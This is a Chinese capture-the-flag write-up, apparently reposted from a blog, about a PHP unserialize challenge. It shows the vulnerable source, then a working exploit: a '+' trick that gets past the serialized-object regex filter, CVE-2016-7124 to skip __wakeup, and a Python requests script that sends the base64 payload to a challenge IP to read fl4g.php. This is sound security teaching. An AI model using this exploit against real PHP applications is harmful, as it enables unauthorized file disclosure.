标签：__ php 21 Demo ctf file var 序列化

题目给了源码，我们先进行代码审计

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

知识点:
1.php中带有双下划线'__'的是魔术方法，会在满足条件的时候自动调用。
观察Demo类，我们发现了3个魔术方法:

①.__contruct :类被创建的时候自动调用，用得到的函数赋值给$file

②.__destruct :销毁时调用这里会显示文件的代码

③.__wakeup :当有反序列化的时候就会被调用，把$file重置为index.php

题目过程:
接受var变量并base64解码，匹配''/[oc]:\d+:/i''（首字母为o或c，冒号，一个或多个数字，冒号，忽略大小写），成功提示stop hacking，失败反序列化var变量（程序结束会销毁新建的Demo对象，触发__destruct()）。

使用+可以绕过preg_match()，绕过__wakeup()是利用CVE-2016-7124，例如O:4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}（正常是O:4:"Demo":1:...），反序列化化时不会触发__wakeup()。

最后一个问题是使用hackbar或者浏览器直接var?=...的话\0会被认为是两个字符，需要使用python提交

import base64
import requests

s = base64.b64encode(b'O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}')
url = 'http://111.198.29.45:43225/'
params = {'var':s}
r = requests.get(url,params=params)
print(r.text)

标签：__,php,21,Demo,ctf,file,var,序列化
来源： https://www.cnblogs.com/linzexing/p/16033008.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。